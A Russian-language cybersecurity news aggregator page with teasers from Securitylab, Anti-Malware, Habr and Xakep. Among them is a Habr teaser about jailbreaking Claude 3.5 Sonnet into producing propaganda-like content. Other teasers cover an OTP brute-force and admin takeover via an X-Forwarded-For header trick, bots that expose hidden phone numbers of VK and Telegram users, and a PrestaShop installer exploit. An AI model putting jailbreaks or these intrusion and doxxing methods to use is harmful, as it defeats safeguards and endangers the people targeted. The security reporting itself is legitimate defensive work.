Кибербезопасность
👉 от %username%
Подборка ресурсов по кибербезопасности
На русском 🇷🇺
Securitylab
последний пост 1 час назад
SIEM, SOAR и XDR: какой инструмент обеспечит по-настоящему непробиваемую защиту?
SIEM, SOAR и XDR: какой инструмент обеспечит по-настоящему непробиваемую защиту? SIEM, SOAR и XDR: какой инструмент обеспечит по-настоящему непробиваемую защиту?

Решения, которые заставят хакеров сдаться без боя.

1 час назад @ securitylab.ru
ИИ на службе маркетинга: Growk AI взламывает коды восточных и западных рынков
ИИ на службе маркетинга: Growk AI взламывает коды восточных и западных рынков ИИ на службе маркетинга: Growk AI взламывает коды восточных и западных рынков

Разработчики готовы покорять фестиваль COMEUP 2024.

13 часов назад @ securitylab.ru
Суверенный интернет в действии: тест в Дагестане
Суверенный интернет в действии: тест в Дагестане Суверенный интернет в действии: тест в Дагестане

В республике пропали WhatsApp, Telegram и YouTube.

13 часов назад @ securitylab.ru
Вертолет + реактивный джет: X-plane презирает законы аэродинамики
Вертолет + реактивный джет: X-plane презирает законы аэродинамики

Вертикальный взлет, сверхзвук и другие невозможные фишки самолета компании Bell.

14 часов назад @ securitylab.ru
GitHub в огне: хакеры превратили библиотеку Ultralytics в криптошахту
GitHub в огне: хакеры превратили библиотеку Ultralytics в криптошахту GitHub в огне: хакеры превратили библиотеку Ultralytics в криптошахту

Всего одна строка кода открыла доступ к миллионам загрузок.

18 часов назад @ securitylab.ru
Последние дни TikTok? Силы компании в схватке с США на исходе
Последние дни TikTok? Силы компании в схватке с США на исходе Последние дни TikTok? Силы компании в схватке с США на исходе

Верховный суд – единственная (но очень хрупкая) надежда ByteDance.

21 час назад @ securitylab.ru
Маленький чип Xiaohong, большие перемены: как Китай преодолел порог в 500 кубитов
Маленький чип Xiaohong, большие перемены: как Китай преодолел порог в 500 кубитов Маленький чип Xiaohong, большие перемены: как Китай преодолел порог в 500 кубитов

Новый квантовый компьютер бросает очередной вызов IBM и Google.

21 час назад @ securitylab.ru
Zero-Day атака в Windows: хакеры могут украсть пароль при простом просмотре файла
Zero-Day атака в Windows: хакеры могут украсть пароль при простом просмотре файла Zero-Day атака в Windows: хакеры могут украсть пароль при простом просмотре файла

Новый вызов безопасности для всех версий Windows.

1 day, 1 hour назад @ securitylab.ru
Провод-шпион: томография обнажает опасность простого USB-C кабеля
Провод-шпион: томография обнажает опасность простого USB-C кабеля

USB-C под рентгеном показал скрытые шпионские модули.

1 day, 1 hour назад @ securitylab.ru
Разработан квантовый радар для зондирования целей за сотни километров
Разработан квантовый радар для зондирования целей за сотни километров

Новый метод дистанционного зондирования меняет представления о визуализации.

1 day, 2 hours назад @ securitylab.ru
Обнаружение шрамов пространства-времени: как детекторы LIGO читают память звездных взрывов
Обнаружение шрамов пространства-времени: как детекторы LIGO читают память звездных взрывов Обнаружение шрамов пространства-времени: как детекторы LIGO читают память звездных взрывов

Ученые раскрывают тайну гравитационной памяти суперновых.

1 day, 16 hours назад @ securitylab.ru
Роскомнадзор готовит зачистку зарубежных хостингов
Роскомнадзор  готовит зачистку зарубежных хостингов Роскомнадзор готовит зачистку зарубежных хостингов

Как это скажется на рынке?

1 day, 19 hours назад @ securitylab.ru
Настоящие бриллианты теперь можно создавать с нуля в лаборатории всего за 15 минут
Настоящие бриллианты теперь можно создавать с нуля в лаборатории всего за 15 минут Настоящие бриллианты теперь можно создавать с нуля в лаборатории всего за 15 минут

Новые методы синтеза приведут к снижению цен на алмазы в мире.

2 days, 1 hour назад @ securitylab.ru
Война компроматов: представлен крупнейший архив утечек секретных материалов в Мире
Война компроматов: представлен крупнейший архив утечек секретных материалов в Мире

DDoSecrets запускает глобальную библиотеку данных.

2 days, 1 hour назад @ securitylab.ru
Сверхпроводимость вопреки природе: научный поворот, меняющий понимание материй
Сверхпроводимость вопреки природе: научный поворот, меняющий понимание материй

Рассказываем, как углеродные слои меняют законы физики.

2 days, 12 hours назад @ securitylab.ru
Anti-Malware Anti-Malware
последний пост 2 days, 20 hours назад
SOC Forum 2024: что важнее для развития ИБ — конкуренция или сотрудничество?
SOC Forum 2024: что важнее для развития ИБ — конкуренция или сотрудничество? SOC Forum 2024: что важнее для развития ИБ — конкуренция или сотрудничество?

Пленарная сессия на SOC Forum 2024Усилению рисков способствует недостоверный контент, который оказывает пагубное влияние, особенно на детей.

Поэтому на SOC Forum 2024 можно было ждать ответа на вопрос о том, насколько хорошо удалось решить эти задачи.

Заседание международной секции на SOC Forum 2024Сотрудничество игроков или жёсткая конкуренция?

Участники пленарной сессии о конкурентных преимуществах ИБ на SOC Forum 2024«Алгоритм поиска» таких ниш подсказал Игорь Душа, директор портфеля продуктов по ИБ НОТА КУПОЛ («Холдинг Т1»).

Могут ли все участники рынка уже сейчас инвестировать в развитие своих систем ИБ в той же степени, как это делают крупные компании?

2 days, 20 hours назад @ anti-malware.ru
Мониторинг и реагирование: от сервисной модели к собственному SOC
Мониторинг и реагирование: от сервисной модели к собственному SOC Мониторинг и реагирование: от сервисной модели к собственному SOC

Варианты запуска мониторинга и реагированияВыбор схемы запуска SOC зависит от характеристик организации, зрелости её процессов и особенностей инфраструктуры.

Компания не считает целесообразным инвестировать в реализацию собственного SOC, но понимает важность и необходимость функции мониторинга и реагирования на инциденты.

Исходя из этих данных формируются концепция SOC, дорожная карта создания и развития SOC и финансово-экономическое обоснование.

Актуальные для компании киберугрозыНеобходимо определить ландшафт угроз, актуальный для компании.

Во-первых, это позволит правильно приоритизировать подключение источников событий и подобрать необходимые инструменты для мониторинга и реагирования, …

2 days, 23 hours назад @ anti-malware.ru
Обзор CICADA8 ETM, сервиса управления уязвимостями и цифровыми угрозами
Обзор CICADA8 ETM, сервиса управления уязвимостями и цифровыми угрозами Обзор CICADA8 ETM, сервиса управления уязвимостями и цифровыми угрозами

Сервис CICADA8 ETM предназначен для управления уязвимостями на внешнем периметре, защиты бренда, поиска корпоративных данных в общем доступе и в даркнете, а также для анализа инфополя.

Платформа управления цифровыми угрозами CICADA8 ETM предназначена для постоянного анализа брешей в ИТ-инфраструктуре и минимизации рисков их использования для дальнейших неправомерных действий.

Преимущества сервиса CICADA8 ETM перед пентестомСервис построен на опыте команды CICADA8 в разных сферах ИБ.

Выгрузка активов в формате XLS в CICADA8 ETMВ случае возникновения вопросов относительно конкретного актива можно задать их в соответствующем разделе его карточки.

Управление уязвимостями в CICADA8 ETMКак и в др…

3 days, 23 hours назад @ anti-malware.ru
Secure by Design: как внедрить подход конструктивной кибербезопасности на практике
Secure by Design: как внедрить подход конструктивной кибербезопасности на практике Secure by Design: как внедрить подход конструктивной кибербезопасности на практике

Давайте вместе с экспертами AM Live разберёмся, какие принципы лежат в основе подхода Secure by Design и из чего состоит процесс обеспечения конструктивной кибербезопасности.

Результаты первого опроса среди зрителей эфира показали, насколько они знакомы с понятием конструктивной кибербезопасности.

Владимир Карантаев описал свой подход к оцениванию конструктивной безопасности: система поддержки принятия решений плюс цифровые двойники.

Составляющие удачного проекта по конструктивной кибербезопасности: мнения экспертовВладимир Карантаев:«Самое главное — заложить безопасность как продуктовое свойство».

ВыводыКонструктивная кибербезопасность представляет собой подход, который акцентирует внимани…

4 days, 17 hours назад @ anti-malware.ru
Обзор Ideco NGFW 18, универсального файрвола нового поколения
Обзор Ideco NGFW 18, универсального файрвола нового поколения Обзор Ideco NGFW 18, универсального файрвола нового поколения

Увидеть работу Ideco NGFW на практике нам поможет демостенд, где мы осуществим ряд действий в веб-консоли администратора на базе популярного кейса.

Функциональные возможности Ideco NGFWНачнём с основных функций, которые были доступны до релиза Ideco NGFW 18.

Реализация DNS-фильтрации в Ideco NGFW также обеспечивает дополнительный рубеж защиты от обхода NGFW.

Device VPN — это режим работы другого продукта, Ideco Client, в котором клиентское устройство авторизовывается в Ideco NGFW без входа пользователя в систему.

Системные требования Ideco NGFWВыбор оптимальной аппаратной конфигурации сервера напрямую зависит от нагрузки, возлагаемой на Ideco NGFW, поэтому необходимо учитывать следующие фак…

4 days, 23 hours назад @ anti-malware.ru
Обзор BI.ZONE EDR 1.35, системы защиты конечных точек от сложных киберугроз
Обзор BI.ZONE EDR 1.35, системы защиты конечных точек от сложных киберугроз Обзор BI.ZONE EDR 1.35, системы защиты конечных точек от сложных киберугроз

BI.ZONE EDR на каждом этапе жизненного цикла инцидентаThreat Prediction, автоматизированное выявление неудачных конфигурацийДля ограничения возможностей злоумышленника по развитию атаки BI.ZONE EDR использует модуль Threat Prediction.

Threat Detection, обнаружение атакСбор телеметрииДля обнаружения угроз BI.ZONE EDR собирает большой объём телеметрии с конечных точек.

Также пользователи могут разрабатывать собственные политики сбора телеметрии и выявления угроз в зависимости от особенностей инфраструктуры и типов конечных точек.

Изоляция хоста в BI.ZONE EDRЗдесь же можно установить модули, необходимые для эффективного выполнения возложенных на BI.ZONE EDR задач.

Просмотр событий в BI.ZONE ED…

5 days, 21 hours назад @ anti-malware.ru
Как помочь генеральному директору построить информационную безопасность
Как помочь генеральному директору построить информационную безопасность Как помочь генеральному директору построить информационную безопасность

Но какие требования и в каком объёме должен предъявлять гендиректор к подчинённым?

Ответственность за ИБ в компании: прямая или косвенная?

Подобные случаи, по её словам, были и в России в 2023 году.

Главные элементы мониторинга устойчивости ИБ в компанииСовет директоров и культура кибербезопасности внутри компанииОтветственным за развитие ИБ является исполнительный директор (CEO).

Как повысить качество надзора за ИБ со стороны совета директоровОт теории к практикеМы уже отмечали, что организатором мероприятия выступила ГК «Солар».

1 week, 2 days назад @ anti-malware.ru
Смогут ли штрафы за утечки данных поднять низкий уровень ИБ в российских компаниях
Смогут ли штрафы за утечки данных поднять низкий уровень ИБ в российских компаниях Смогут ли штрафы за утечки данных поднять низкий уровень ИБ в российских компаниях

Общей темой обсуждения было развитие законодательного регулирования в области ИБ, а конкретным предметом разговора — вопрос о штрафах за утечки данных.

Позиция бизнесаАлексей Волков, вице-президент по ИБ в компании «Билайн», придерживается иного подхода к оценке ситуации.

В этих условиях утечки данных нацелены в первую очередь не на получение уникальной информации о человеке (о нём уже и так всё известно).

Даже если компания потратит 100 % своего бюджета на ИБ, у тех, кто атакует, бюджет всё равно больше».

Наказание в адрес службы ИБ, которая не имела соответствующих средств, чтобы воспрепятствовать утечке, выглядит не в пользу развития системы безопасности.

1 week, 2 days назад @ anti-malware.ru
Будущее отечественного сетевого оборудования: инновации и безопасность
Будущее отечественного сетевого оборудования: инновации и безопасность Будущее отечественного сетевого оборудования: инновации и безопасность

Ситуация на рынке сетевого оборудованияС 2022 года на рынке стали активно развиваться отечественные решения, в том числе и сетевое оборудование.

Какое сетевое оборудование в основном используется в вашей компании?

На что ориентироваться при выборе российского сетевого оборудования?

По мнению зрителей, участвовавших в опросе, совершенствовать нужно всё: и функциональность, и сервис с качеством поддержки, и производительность с совместимостью.

Александр Баринов рассказал о тренде комплексного проектирования кибербезопасности и сетевого оборудования, где ИТ и ИБ должны работать в тандеме.

1 week, 2 days назад @ anti-malware.ru
Как решение от ARinteg помогает организовать в 1С учёт персональных данных
Как решение от ARinteg помогает организовать в 1С учёт персональных данных Как решение от ARinteg помогает организовать в 1С учёт персональных данных

Модуль «Учёт персональных данных» ― продукт компании ARinteg, который позволяет поддерживать в актуальном состоянии внутренние документы, необходимые при обработке ПДн в соответствии с законом 152-ФЗ.

ВведениеМодуль «Учёт персональных данных» (УПДн) от ARinteg ― это дополнение (расширение) к конфигурации 1С «Зарплата и управление персоналом».

Описание модуля «Учёт персональных данных»Модуль «Учёт персональных данных» создан в ответ на требования профильного законодательства и в помощь специалистам, которые ведут документооборот предприятия в рамках 152-ФЗ.

Компоненты модуля «Учёт персональных данных»СправочникиКомпонент содержит справочные материалы, на основании которых должен строиться уч…

1 week, 3 days назад @ anti-malware.ru
Обзор DCImanager 6, платформы для управления ИТ-инфраструктурой
Обзор DCImanager 6, платформы для управления ИТ-инфраструктурой Обзор DCImanager 6, платформы для управления ИТ-инфраструктурой

DCImanager 6 — система от ISPsystem для управления стойками, серверами, сетями, распределителями питания и ИБП в мультивендорной инфраструктуре.

ВведениеDCImanager 6 — это российская платформа для управления мультивендорной ИТ-инфраструктурой в дата-центрах и серверных, разработанная ISPsystem.

DCImanager 6 включает в себя готовые сервисы для контроля состояния физической инфраструктуры и отправки оповещений, системы управления правами, механизмы диагностики.

Карта ЦОДВизуализация размещения оборудования в стойках и дата-центреЭта функция упрощает управление физической инфраструктурой и помогает быстро находить свободные места для установки нового оборудования.

Аппаратные требованияПри испо…

1 week, 3 days назад @ anti-malware.ru
Концепция непрерывной безопасности: сокращаем разрыв между тремя векторами в кибербезе
Концепция непрерывной безопасности: сокращаем разрыв между тремя векторами в кибербезе Концепция непрерывной безопасности: сокращаем разрыв между тремя векторами в кибербезе

В таком случае основная задача концепции непрерывной безопасности — сделать разрыв между всеми тремя векторами минимальным.

Такое ПО в учебном примере собирает данные в файл и не высылает их «злоумышленнику».

К счастью, вендоры не стоят на месте и помогают не только в защите от сложных целевых атак, но и на уровнях ниже.

Основные функции Kaspersky NDRВыводыМы рассмотрели концепцию непрерывной безопасности, а также возможности и способы сокращения разрыва между тремя векторами в ИБ, особенно между навыками злоумышленников и функциональностью средств защиты.

Внедрение новых дорогостоящих решений может быть неоптимальным без выстраивания синергии инструментов и учёта сразу нескольких аспектов …

1 week, 3 days назад @ anti-malware.ru
Экосистемы кибербезопасности: оптимизация защиты через интеграцию
Экосистемы кибербезопасности: оптимизация защиты через интеграцию Экосистемы кибербезопасности: оптимизация защиты через интеграцию

Можно закрыть большую задачу, но часто бывает, что в экосистему включают один хороший продукт, а остальные не дотягивают по качеству.

Пока они не увидят в сотрудничестве больше ценности, чем в конкуренции, роста экосистем на рынке кибербезопасности не будет.

По мнению Владимира Бенгина, опрос показывает, что заказчики разочаровались в работе с одним вендором и в способности последнего решить проблемы безопасности.

Процесс подбора решений различается, но в целом сам переход с зарубежных продуктов можно совместить с организацией экосистемы.

Результаты третьего опроса показали, что для пользователей при выборе экосистемы кибербезопасности неизменно важна широта линейки продуктов и услуг.

1 week, 4 days назад @ anti-malware.ru
Как беспарольная аутентификация спасает компании от новейших киберугроз
Как беспарольная аутентификация спасает компании от новейших киберугроз Как беспарольная аутентификация спасает компании от новейших киберугроз

Ключи на физических носителях, хотя и имеют дополнительную защиту в виде ПИН-кодов, всё же подвержены риску кражи и (в некоторых случаях) дублирования.

Путь перехода на PasskeyПуть перехода на Passkey начинается с использования традиционных факторов аутентификации, уязвимых для фишинга, таких как логин и пароль.

Больше никаких затрат на:обработку тикетов по восстановлению доступа,создание и обновление паролей для сотрудников,поддержку инфраструктуры хранения паролей,обучение пользователей парольным политикам.

Браузер передаёт ответ в формате JSON, содержащий итоги аутентификации и соответствующие им клиентские данные, на сервер доверяющей стороны (5).

Технические специалисты помогут сориент…

1 week, 4 days назад @ anti-malware.ru
Российский рынок сетевого оборудования: новые реалии после санкций
Российский рынок сетевого оборудования: новые реалии после санкций Российский рынок сетевого оборудования: новые реалии после санкций

Дошло до того, что она решилась на утилизацию своего оборудования на российских складах почти на 2 миллиарда рублей!

Оценка рынка российского сетевого оборудования с 2019 по 2023 годыСогласно данным российской аналитической компании J’son & Partners Consulting, отечественный рынок сетевого оборудования вырос на 23,5 % с 2019 по 2023 годы, достигнув отметки в 784 млрд рублей.

Непривычность российского оборудования для рынкаРоссийский рынок долгое время был ориентирован на западное оборудование, и многие специалисты не готовы к переходу на новые системы.

Производство различных видов сетевого оборудования в РоссииРоссийский рынок сетевого оборудования активно развивается, стимулируя отечествен…

1 week, 5 days назад @ anti-malware.ru
Хабр: ИБ Хабр: ИБ
последний пост 13 часов назад
Как я взломал одну из самых топовых нейросетей (Claude 3.5 Sonnet) для студенческой научной статьи
Как я взломал одну из самых топовых нейросетей (Claude 3.5 Sonnet) для студенческой научной статьи Как я взломал одну из самых топовых нейросетей (Claude 3.5 Sonnet) для студенческой научной статьи

Будучи авантюристом я выбрал тему, которая была мне ближе и интереснее... и так получилось, что в пылу энтузиазма я немного перевыполнил свой план.

Claude выделяется среди языковых моделей следующими характеристиками:Мультимодальность: Способен эффективно работать как с текстом различных форматов, так и с изображениями, демонстрируя высокий уровень компьютерного зрения.

Создается образ "большой фармы" как безжалостной машины, заинтересованной только в получении прибыли, а не в здоровье детей.

В действительности у меня на руках оказался довольно мощный инструмент, и я понятия не имею что с ним делать дальше.

Само собой я не использовал его в каких‑либо плохих целях, почти сразу после его раз…

13 часов назад @ habr.com
ZIP-бомба в формате Apache Parquet
ZIP-бомба в формате Apache Parquet ZIP-бомба в формате Apache Parquet

Например, в формате Apache Parquet Напомним, что исторически ZIP-бомба (файловая бомба или архив смерти) представляла собой архивный файл, при распаковке которого можно вызвать зависание операционной системы или рабочего приложения путём заполнения всего свободного места на носителе или оперативной/рабочей памяти.

Apache Parquet — свободный формат хранения данных в колончатой БД типа Apache Hadoop.

Он похож на RCFile, ORC и другие форматы колоночного хранения файлов в Hadoop, совместим с большинством фреймворков обработки данных в Hadoop.

Затем поставил ссылки на эту словарную статью, используя кодирование длин серий в Parquet.

Как уже упоминалось, файлы Parquet содержат одну или несколько …

13 часов назад @ habr.com
От CNAPP до CTEM — ИБ-термины простыми словами
От CNAPP до CTEM — ИБ-термины простыми словами От CNAPP до CTEM — ИБ-термины простыми словами

Простыми словами объясняем распространённые термины, обозначающие механизмы и решения для защиты различных сред: от управления правами доступа до межсетевых экранов.

Три четверти респондентов отметили, что их организация применяет CNAPP для защиты мультиоблачной среды.

PAMСогласно исследованию консалтинговой компании Forrester 2018 года, 80% утечек были связаны с компрометацией учетных данных с повышенными правами.

Согласно исследованию компании IBM, проведённому в этом году, в 75% случаев ущерб от взлома для организаций рос из-за расходов на ликвидацию последствий.

Согласно прогнозам Gartner, организации, инвестирующие в безопасность на основе CTEM, добьются сокращения числа взломов на две…

14 часов назад @ habr.com
Анализ аккаунтов Telegram
Анализ аккаунтов Telegram Анализ аккаунтов Telegram

Этап 2Узнаём различную информацию о пользователе при помощи ботовInsightНаилучший условно-бесплатный бот для разведки аккаунтов телеграм.

Здесь нас приветствует множество пунктов после того как мы ввели id целевого аккаунта, давайте же поскорее рассмотрим все пункты которые нам доступны.

Этой валютой бот делится щедро с вами при первом заходе в бот, и дарит он вам аж целых 20 кристаллов.

К сожалению на внутреннюю валюту не такой щедрый как предыдущие боты, но и не тратит, если информацию не нашёл.

ЗаключениеНадеемся, что боты поведанные нами в этой статье, помогут в расследованиях и в накоплении опыта энтузиастов.

20 часов назад @ habr.com
[Перевод] Обход OTP и захват панели администратора через Header Injection
[Перевод] Обход OTP и захват панели администратора через Header Injection [Перевод] Обход OTP и захват панели администратора через Header Injection

Это означает, что изменение IP-адреса клиента или IP-адреса, представляемого серверу, может помочь обойти это ограничение и продолжить перебор OTP.

Как и ожидалось, мне удалось выполнить брутфорс OTP и добиться успешного входа через OTP.

Было очевидно, что имеется уязвимость Header Injection, поэтому, помимо обхода IP-контроля или ограничения скорости, могли быть и другие возможности для эксплуатации.

Если установить заголовок X-Forwarded-For: 127.0.0.1, сервер будет считать, что доступ осуществляется с внутреннего IP-адреса, и позволит пользователю получить доступ к ограниченному контенту.

И, помимо этого, я успешно выполнил горизонтальную эскалацию привилегий (хотя я не пытался войти в по…

1 day, 20 hours назад @ habr.com
Топ новостей инфобеза за ноябрь 2024 года
Топ новостей инфобеза за ноябрь 2024 года Топ новостей инфобеза за ноябрь 2024 года

Под аккомпанемент оценок от «Сбера» остатки ещё не слитых данных россиян и не только решила добить одна известная букмекерская конторка 1WIN.

Хотя здесь вопрос скорее не в том, кто устроил атаку — желающих хватает, а почему в 2024-м IP-спуфинг всё ещё проблема.

Хорошие новости: буткит — ранняя проверка концепции, а не замеченный в сетевых дебрях инструмент для атак, и он заточен только под несколько версий Ubuntu, а не под ядро в целом.

Да и в сущности осведомлённость повысилась явно не только у ИБ-специалистов, но и у тех, кто был бы совсем не против таким буткитом воспользоваться.

Что, в общем-то, справедливо.

2 days, 20 hours назад @ habr.com
Погружаемся в матрицу: как MITRE ATT&CK помогает бороться с APT-группировками
Погружаемся в матрицу: как MITRE ATT&CK помогает бороться с APT-группировками Погружаемся в матрицу: как MITRE ATT&CK помогает бороться с APT-группировками

Собственно, аббревиатура и расшифровывается как Endpoint Detection and Response, что можно перевести как «обнаружение и реагирование на конечных устройствах».

Далее мы разберем деятельность четырех известных APT-группировок, а также рассмотрим, как MaxPatrol EDR и MITRE ATT&CK помогают защититься от их атак.

Авторы Decoy Dog постарались максимально усложнить его обнаружение не только в трафике, но и в файловой системе.

Нейтрализовать угрозу в этом случае помогут модули завершения процессов, удаления файлов и помещения их в карантин.

💥 Dark River: высокотехнологичный бэкдор и атаки на ОПКХакеров из Dark River, так же как и из ExCobalt, интересует кибершпионаж.

2 days, 21 hours назад @ habr.com
Боты и сервисы для разведки данных Вконтакте
Боты и сервисы для разведки данных Вконтакте Боты и сервисы для разведки данных Вконтакте

Не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.

Вот к тебе в друзья добавляется рандомная личность и ты не понимаешь кто это и откуда.

Открываешь это приложение и заходишь в этот пункт и видишь, что этот человек знает тебя через твоих знакомых и что всё в порядке.

Ну а теперь просто вводим имя и фамилию человека и после чего видим и сверяем первые 6 цифр номера.

Переходим в бот который нельзя называть, вводим фамилию и имя и нам выпадает результат скрытых номеров.

2 days, 22 hours назад @ habr.com
Особенности использования сторонних сервисов в мобильных приложениях на примере Firebase
Особенности использования сторонних сервисов в мобильных приложениях на примере Firebase Особенности использования сторонних сервисов в мобильных приложениях на примере Firebase

Сегодня практически каждая мобильная разработка включает в себя использование сторонних сервисов, и Firebase, разработанный компанией Google, стал одним из самых популярных.

Чтобы использовать описанные выше сервисы, нам нужно сначала инициализировать Firebase в коде с помощью данных, которые выдаются при создании проекта в его консоли.

Все, что мы получили — это сообщение в консоли Firebase о том, что мы исчерпали половину запросов, после которого начинается платный тариф.

В этом разделе мне бы хотелось собрать самые интересные проблемы, которые мы встречали в Firebase-сервисах в самых различных приложениях.

Серверные ключи FCM/GCMДа, несмотря на то, что на дворе 2024-й год, часть приложен…

3 days назад @ habr.com
Как надёжно стереть секретную информацию из базы данных
Как надёжно стереть секретную информацию из базы данных Как надёжно стереть секретную информацию из базы данных

И так как мы разрабатываем Natch - инструмент поиска поверхности атаки, то все проблемы выглядят как гвозди решили с помощью него исследовать потоки данных в СУБД.

Дело в том, что Natch пока что не отслеживает распространение помеченных данных на дисковых накопителях.

Тут, как и в postgres, кроме файла с таблицей, есть и дополнительные файлы с транзакциями - binlog и redo log.

Поток данных из ib_logfile0 в grep не обнаружился, значит MariaDB умеет делать так, чтобы ОС не кэшировала данные этого файла в памяти.

Удивительно, что данные из таблицы пропали после обычного DELETE.

3 days, 1 hour назад @ habr.com
Как на Excel заработать сотни миллионов? Опыт проекта RTO
Как на Excel заработать сотни миллионов? Опыт проекта RTO Как на Excel заработать сотни миллионов? Опыт проекта RTO

Предыдущая команда при переходе на следующий этап на защите проекта "немного слукавила", не выполнив половину пунктов, которые обязана была сделать в рамках 1 этапа.

Существуют решения, где модель расположена внутри технологической сети передачи данных (ТСПД) и не связаны корпоративной сетью передачи данных (КСПД).

А часть данных хоть и на первый взгляд нормальные, не Bad'ы какие-нибудь и не нули, но имеют регулярную системную ошибку.

Конфигурация файла для отправки на сервер пользователя с отображением на интерфейсе итогов оптимизации.

TimeExpire = Now + TimeValue("00:30:00")Ну и все, еще чуть чуть и на выходе имеем уже готовое решение для оптимизации производства с годовым эффектом в сотн…

3 days, 11 hours назад @ habr.com
Прямо как в Black Mirror: какие сюжеты фантастического сериала могут скоро воплотиться в реальную жизнь
Прямо как в Black Mirror: какие сюжеты фантастического сериала могут скоро воплотиться в реальную жизнь Прямо как в Black Mirror: какие сюжеты фантастического сериала могут скоро воплотиться в реальную жизнь

Первые серии Black Mirror вышли в 2011 году, и за это время некоторые сюжеты сериала пугающе приблизились к реальности.

Значит, ничто не мешает воспроизводить не реальную картинку, а дополнительные изображения — от дополненной реальности до мультимедийных потоков, как это показано в Black Mirror.

Финтех и e-commerce в этом плане наиболее уязвимые отрасли, так как массово используют открытый код в разработке клиентских сервисов и приложений.

Этой возможностью пользуются и преступники, как это было в 2022 году после утечки данных в одном из крупнейших сервисов доставки еды.

В попытках регулировать ИИ не стоит забывать, что это обоюдоострое оружие, которое играет и на стороне киберпреступников.

3 days, 15 hours назад @ habr.com
UserGate 7: итоги теста + переход со старых версий
UserGate 7: итоги теста + переход со старых версий UserGate 7: итоги теста + переход со старых версий

В этой статье я расскажу об актуальном для многих вопросе — миграции с UserGate 6 на версию 7.

Под катом я собрал все о преимуществах UserGate v.7 с инструкцией о переходе на нее с предыдущей версии.

У них будет выставлен action = accept и будет добавлен созданный L7 профиль.

В них будет один фильтр вида «id IN (...)», который будет включать все идентификаторы сигнатур СОВ из профиля СОВ старой версии.

Переход на UserGate 7 — это несложный процесс.

3 days, 18 hours назад @ habr.com
Действуем на опережение: предотвращаем скрытые угрозы с помощью статистики
Действуем на опережение: предотвращаем скрытые угрозы с помощью статистики Действуем на опережение: предотвращаем скрытые угрозы с помощью статистики

Однако стремительный рост числа API и увеличивающееся количество угроз заставили пересмотреть этот подход.

В ответ на эту проблему команда разработчиков Вебмониторэкс создала средство защиты ПроAPI Структура, которое позволяет инвентаризировать все API, узнать их состав и выявить уязвимости.

Важным дополнением нашего решения стала новая функциональность, которая позволяет собирать статистику по роутам и использовать её для раннего обнаружения атак и оперативного реагирования на них.

При работе с API используются понятия эндпоинт и роут.

Новые возможности станут полезным инструментом для мониторинга трафика запросов на роут, определения начала атаки и своевременного оповещения пользователей.

3 days, 18 hours назад @ habr.com
Книга: «Внутреннее устройство Windows. Ключевые компоненты и возможности. 7-е изд.»
Книга: «Внутреннее устройство Windows. Ключевые компоненты и возможности. 7-е изд.» Книга: «Внутреннее устройство Windows. Ключевые компоненты и возможности. 7-е изд.»

Авторами книги являются два опытных профессионала по разработке операционных систем и защите информации, Андреа Аллиеви и Алекс Ионеску.– уже более 15 лет занимает должности системного программиста и специалиста по безопасности.

Он получил степень бакалавра в Миланском университете «Бикокка» и в рамках своего дипломного проекта написал 64-разрядного диспетчера главной загрузочной записи (MBR), способного обходить любые средства защиты ядра Windows 7.

В 2016 году Андреа пришёл в Microsoft в качестве специалиста по безопасности Центра защиты информации (MSTIC).

В прошлом он руководил разработкой ядра ReactOS, клона Windows с открытым кодом, который создавался с нуля.

Наконец, этот человек осн…

3 days, 20 hours назад @ habr.com
Хакер Хакер
последний пост 1 day, 20 hours назад
Хакеры.RU. Глава 0х01. Точка входа
Хакеры.RU. Глава 0х01. Точка входа Хакеры.RU. Глава 0х01. Точка входа

Се­год­ня за окном мут­ной сте­ной лил дождь, и он совер­шенно не впи­сывал­ся в тща­тель­но про­думан­ные Кирил­лом и Саней пла­ны.

Он огля­нул­ся на Сан­чо.

— Все будет нор­маль­но, — тихо ска­зал Сан­чо, не под­нимая головы.

Трам­вай затор­мозил и с ляз­гом рас­пахнул две­ри, впус­кая в салон холод­ный, про­питан­ный дож­дем воз­дух.

Очу­тив­шись перед нуж­ной ком­натой без вывес­ки, Кирилл на мгно­вение ощу­тил про­бежав­ший по спи­не холодок стра­ха.

1 day, 20 hours назад @ xakep.ru
Стилер RedLine маскируется под пиратский активатор для популярного бухгалтерского ПО
Стилер RedLine маскируется под пиратский активатор для популярного бухгалтерского ПО Стилер RedLine маскируется под пиратский активатор для популярного бухгалтерского ПО

Атакующие распространяют стилер RedLine на бухгалтерских форумах, маскируя его под пиратский активатор HPDxLIB, предназначенный для популярного софта.

По данным исследователей, эта вредоносная кампания началась еще в январе 2024 года и представляет угрозу до сих пор.

Злоумышленники публикуют объявления на профильных форумах о ведении бизнеса и бухгалтерском учете, предлагая скачать обновленную версию активатора HPDxLIB.

Эксперты напоминают, что RedLine распространяется по схеме Malware-as-a-Service (MaaS, малварь-как-услуга).

Исследователи полагают, что сервер могут арендовать разные хак-групп, распространяющие RedLine, то есть используемая атакующими версия могла быть приобретена по подпис…

2 days, 14 hours назад @ xakep.ru
Громим PrestaShop. Как я захватил инсталл интернет-магазина на багбаунти
Громим PrestaShop. Как я захватил инсталл интернет-магазина на багбаунти Громим PrestaShop. Как я захватил инсталл интернет-магазина на багбаунти

В этой статье я рас­ска­жу, как одна малень­кая ошиб­ка с уста­новоч­ным скрип­том в CMS PrestaShop может открыть дверь для уда­лен­ного выпол­нения кода.

Про­цесс устро­ен так же, как и в дру­гих CMS вро­де WordPress или Joomla.

Пос­коль­ку это MySQL, воз­можно ли у нас чте­ние фай­лов через Rogue MySQL (вклю­чена ли фун­кция --enable-local-infile на кли­енте).

Но мы не хотим отвле­кать­ся на дол­гие про­вер­ки, потому что в это вре­мя кто‑то может успеть увес­ти у нас дос­туп к уста­нов­щику.

По‑вся­кому ска­ниро­вать сеть через под­клю­чение к MySQL зву­чит не очень пер­спек­тивно и не даст нам никаких реаль­ных спо­собов ата­ки.

2 days, 15 hours назад @ xakep.ru
Для критической уязвимости в Mitel MiCollab появился PoC-эксплоит
Для критической уязвимости в Mitel MiCollab появился PoC-эксплоит Для критической уязвимости в Mitel MiCollab появился PoC-эксплоит

ИБ-специалисты обнародовали proof-of-concept (PoC) эксплоит, который объединяет в себе исправленную критическую уязвимость в Mitel MiCollab и 0-day проблему произвольного чтения файлов.

В итоге злоумышленник может получить доступ к файлам на сервере.

Эта SQL-инъекция в компоненте NPM позволяла получить доступ к конфиденциальной информации и выполнить произвольные операции с БД.

«Успешная эксплуатация этой уязвимости может позволить злоумышленнику получить несанкционированный доступ и повлиять на конфиденциальность, целостность и доступность системы, — сообщают разработчики Mitel в бюллетене безопасности, посвященном CVE-2024-41713.

В этом случае раскрытие информации ограничивается неконфиде…

